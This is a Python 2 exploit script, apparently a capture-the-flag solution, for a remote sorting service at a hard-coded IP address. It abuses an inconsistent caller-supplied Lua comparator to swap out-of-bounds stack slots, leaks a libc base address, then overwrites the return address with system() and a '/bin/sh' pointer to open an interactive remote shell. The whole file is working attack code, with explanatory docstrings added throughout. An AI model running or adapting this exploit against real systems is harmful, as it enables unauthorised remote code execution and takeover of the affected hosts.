import sys, socket, time, os, re, telnetlib

def get_comparator(n, offset):
    """Return the comparator script text that swap() sends to the service.

    The local helper program ``./compute_answers`` is run with ``n`` and
    ``offset`` as decimal arguments, and its stripped stdout is substituted
    for ``answers`` in the template below. The resulting function ``f(a, b)``
    ignores both arguments and returns the next precomputed entry on each
    call, so it is not a consistent ordering.

    NOTE(review): the template looks like Lua and the output of
    ``compute_answers`` is presumably a table literal -- confirm against the
    helper. The defensive takeaway is that a sort routine accepting a
    caller-supplied comparator has to stay memory-safe even when that
    comparator answers inconsistently.
    """
    command = "./compute_answers %d %d" % (n, offset)
    answers = os.popen(command).read().strip()
    # Assembled piecewise; the text is identical to a single multi-line
    # literal, including the leading newline and the three trailing blank
    # lines.
    template = (
        "\n"
        "answers = %s\n"
        "i = 0\n"
        "function f(a,b)\n"
        "  i = i + 1\n"
        "  return answers[i]\n"
        "end\n"
        "\n"
        "\n"
        "\n"
    )
    return template % answers

def wait_for(s):
    """Block until a single recv() chunk from the global ``sock`` contains ``s``.

    Received data is discarded. Each chunk is checked on its own, so a marker
    that straddles two chunks is not seen, and an empty read (peer closed the
    connection) never matches a non-empty ``s``, so the loop keeps polling.
    """
    chunk = sock.recv(4096)
    while s not in chunk:
        chunk = sock.recv(4096)

def socket_interact(s):
    """Attach the local terminal to the already-connected socket ``s``.

    A ``telnetlib.Telnet`` object is created without opening a connection and
    its ``sock`` attribute is pointed at ``s``; ``interact()`` then relays
    between the terminal and the socket until the session ends.

    NOTE: ``telnetlib`` was removed from the standard library in Python 3.13;
    this script is Python 2 code.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()

def swap(offset, value):
    """Submit one sort request and return the reported value of "Number 1".

    The request written to the global ``sock`` is: menu choice ``7``, the
    comparator text from ``get_comparator(n, n + offset)``, the element count
    ``1024``, then 1024 numbers -- ``value`` followed by 1..1023 -- one per
    line.

    Replies are read until a chunk contains the ``custom\\n:`` prompt. The
    last ``Number 1 is now: <digits>`` match seen in any chunk is returned as
    an int. Each chunk is matched on its own, so digits split across two
    chunks would be truncated, and ``int(None)`` raises ``TypeError`` if no
    match was seen before the prompt.

    NOTE(review): what ``offset`` selects on the server side is not visible
    here; the caller's status messages describe the effect as exchanging the
    first element with a slot outside the array -- confirm against the
    service.
    """
    n = 1024
    numbers = [value]
    numbers.extend(xrange(1, n))
    request = "".join([
        "7\n",
        get_comparator(n, n + offset),
        "1024\n",
        "\n".join(str(v) for v in numbers),
        "\n",
    ])
    sock.send(request)

    latest = None
    done = False
    while not done:
        chunk = sock.recv(4096)
        found = re.search("Number 1 is now: (\d+)", chunk)
        if found is not None:
            latest = found.group(1)
        # Checked after the match so a number and the prompt arriving in the
        # same chunk are both handled.
        done = "custom\n:" in chunk
    return int(latest)

# Module-level connection; wait_for() and swap() use it through the global
# name `sock`. Host and port are hard-coded.
sock = socket.create_connection(("188.40.18.75", 1234))
# Hard-coded offsets. Going by their names they locate the
# __libc_start_main return site, system() and a "/bin/sh" string relative to
# the libc base.
# NOTE(review): offsets like these would be specific to one libc build --
# confirm which build they were taken from.
offset_libc_start_main_ret = 0x19a83
offset_system = 0x3e770
offset_binsh = 0x160264

# Wait for the service's menu prompt before sending anything.
wait_for("custom\n:")
# The number reported back by the first swap() is treated as an address;
# subtracting the offset yields what the script prints as the libc base.
# 0x41414141 is the value sent as the first element (presumably filler).
libc = swap(8, 0x41414141) - offset_libc_start_main_ret
print "[*] leaked libc base =", hex(libc)

# Two further swap() calls send computed addresses as the first element;
# their return values are ignored.
print "[*] overwriting return addr"
swap(8, libc + offset_system)
print "[*] set first argument to /bin/sh"
swap(10, libc + offset_binsh)

# Send menu input "0" (per the original note, this makes the service return),
# then read and discard one reply chunk.
sock.send("0\n")
sock.recv(4096)
print "[*] Enjoy your shell ;)"
# Hand the connection over to the local terminal.
socket_interact(sock)
